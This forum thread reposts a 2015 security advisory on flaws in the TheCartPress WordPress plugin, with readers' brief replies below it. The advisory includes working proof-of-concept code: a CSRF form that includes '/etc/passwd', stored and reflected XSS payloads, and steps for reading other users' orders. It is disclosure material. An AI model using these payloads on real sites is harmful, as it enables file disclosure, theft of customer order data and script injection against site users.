查看: 69856|回复: 135

WordPress TheCartPress Plugin 1.3.9多个漏洞

[复制链接]
  • TA的每日心情

    昨天 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-5-1 14:22:56 | 显示全部楼层 |阅读模式
    CVE: 2015-3301
    [PHP] 纯文本查看 复制代码
    Product: TheCartPress WordPress plugin
    Vendor: TheCartPress team
    Vulnerable Version(s): 1.3.9 and probably prior
    Tested Version: 1.3.9
    Advisory Publication:  April 8, 2015  [without technical details]
    Vendor Notification: April 8, 2015 
    Public Disclosure: April 29, 2015 
    Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
    CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
    Risk Level: High 
    CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
    Discovered and Provided: High-Tech Bridge Security Research Lab ( [url]https://www.htbridge.com/advisory/[/url] ) 
      
    -----------------------------------------------------------------------------------------------
      
    Advisory Details:
      
    High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin.
      
    1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301
      
    Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences.
      
    In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well. 
      
    Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it:
      
    <form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main">
    <input type="hidden" name="tcp_save_fields"  value='1'>
    <input type="hidden" name="tcp_box_path"  value='../../../../../etc/passwd'>
    <input type="submit" id="btn">
    </form>
    <script>
     document.main.submit();
    </script>
      
      
      
    2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300
      
    During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database. 
      
    Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database:
      
    <form action="http://wordpress/shopping-cart/checkout/" method="post" name="main">
    <input type="hidden" name="selected_billing_id"  value='1'>
    <input type="hidden" name="selected_billing_address"  value='new'>
    <input type="hidden" name="billing_firstname"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_lastname"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_company"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_tax_id_number"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_country_id"  value='AF'>
    <input type="hidden" name="billing_region_id"  value=''>
    <input type="hidden" name="billing_region"  value=''>
    <input type="hidden" name="billing_city"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_street"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_street_2"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_postcode"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_telephone_1"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_telephone_2"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_fax"  value='"><script>alert(/immuniweb/);</script>'>
    <input type="hidden" name="billing_email"  value='mail@mail.com'>
    <input type="hidden" name="tcp_continue"  value=''>
    <input type="hidden" name="tcp_step"  value='1'>
    <input type="submit" id="btn">
    </form>
      
      
    A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database, and available to any non-authenticated user on the following URL:
      
    http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order
      
    As well as on the following URL accessible to WordPress administrator only:
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php
      
      
    3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302
      
    Any non-authenticated user may browse orders of other users due to broken authentication mechanism. To reproduce the vulnerability an attacker shall first open the following URL:
    http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]
      
    And just after open the following URL to see full order details:
    http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order
      
    Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables non-authenticated remote attacker to steal all currently-existing orders.
      
      
    4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300
      
    4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
      
    4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
      
    4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
      
    4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
      
    http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
      
    -----------------------------------------------------------------------------------------------
      
    Solution:
      
    2015-04-08 Vendor Alerted via emails.
    2015-04-17 Vendor Alerted via contact form and emails.
    2015-04-17 Vendor Alerted via WordPress Support Forums.
    2015-04-27 Fix Requested via emails.
    2015-04-29 Public disclosure.
      
    Currently we are not aware of any official solution for this vulnerability.
    According to the vendor the plugin will not be supported anymore since 1st of June 2015: [url]http://thecartpress.com/extend/important-note-nota-importante/[/url]
      
    We recommend disabling or removing the vulnerable plugin as a workaround.
     
    [2015-05-01]  #
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-6-26 20:43:45 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 08:01:01 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 10:05:20 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-6-27 13:57:04 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 15:36:36 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-6-27 17:41:11 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 01:06:30 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 05:10:03 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2015-6-28 11:39:17 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-14 14:25 , Processed in 0.028767 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部